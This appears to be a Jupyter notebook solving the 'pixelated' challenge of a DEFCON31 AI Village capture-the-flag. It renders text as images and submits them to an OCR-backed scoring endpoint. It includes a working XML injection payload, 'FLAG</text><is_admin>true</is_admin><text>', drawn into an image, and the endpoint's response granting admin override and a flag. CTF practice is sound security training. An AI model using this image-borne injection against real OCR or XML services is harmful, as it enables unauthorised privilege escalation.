In [72]:
from PIL import Image
import matplotlib.pyplot as plt

def pixelate(img, pixel_size=10):
    img = img.resize(
        (img.size[0] // pixel_size, img.size[1] // pixel_size),
        Image.NEAREST
    )
    img = img.resize(
        (img.size[0] * pixel_size, img.size[1] * pixel_size),
        Image.NEAREST
    )
    return img

img = Image.open('pixelated/flag_full.png')
# plt.figure(figsize=(20, 5))
# img_cropped = img.crop((198, 0, 429, 48))
# bottom left:  70,23
# top right: 855, 0
img_pixelated = pixelate(img, pixel_size=40)
# img.paste(img_pixelated, (198, 0))
img_pixelated.save('pixelated/flag_full_pixes.png')

In [120]:
from PIL import Image, ImageFont

def get_img_from_text(text, filename=None):
    font_size = 36
    font_filepath = "pixelated/font/Lucida Console Regular.ttf"
    color = (0, 0, 0)
    
    font = ImageFont.truetype(font_filepath, size=font_size)
    mask_image = font.getmask(text, mode="1")
    img = Image.new("RGB", mask_image.size, color=(255,255,255))
    img.im.paste(color, (0, 0) + mask_image.size, mask_image)  # need to use the inner `img.im.paste` due to `getmask` returning a core
    if filename:
        img.save(f"pixelated/testing/{filename}.png")
    else:
        img.save(f"pixelated/testing/{text}.png")

In [104]:

import requests
import base64
import os
# with open('/kaggle/input/ai-village-capture-the-flag-defcon31/pixelated/reference.png', 'rb') as f:
with open('yes.png', 'rb') as f:
    input_data = f.read()
    input_data = base64.b64encode(input_data).decode()
# print(input_data)

def query(input_data):
    response = requests.post('http://pixelated.advml.com/score', json={'data': input_data})
    # response = requests.get('http://pixelated.advml.com/score', params={'data': input_data})
    return response.json()

query(input_data)

{'status': 'success', 'upstream_msg': 'Entry inserted', 'text': 'admin'}

## Basically when I tried some random values I figured out this problem consisted of XML injection and then I iterated until I got the flag. 
```xml
<?xml version="1.0" encoding="UTF-8"?>
<request action="get">
    <system>pixelated</system>
    <text>801-867-5309</text>
    <is_admin>true</is_admin>
</request>
```

In [134]:
get_img_from_text("FLAG</text><is_admin>true</is_admin><text>", filename="is_admin_true")
with open(f'pixelated/testing/is_admin_true.png', 'rb') as f:
    input_data = f.read()
    input_data = base64.b64encode(input_data).decode()
print(query(input_data))

{'status': 'admin_override_engaged', 'flag': 'gAAAAABlNpu6B1ubAVoMTDhHzXjwlM475ZwwQsZel6kyEgeJNMMOckT4dH3iNqc_JTsCheGejx32xc5DkmFMYguS_GE5EbFC3_1sNUeKZCJga083-FwI2fv7P6bUTDgyFFs8V8C0WdIC7NEMN0pciggeSiFMP_b5fe08VpVbfplXVH1FFjYXkf4='}
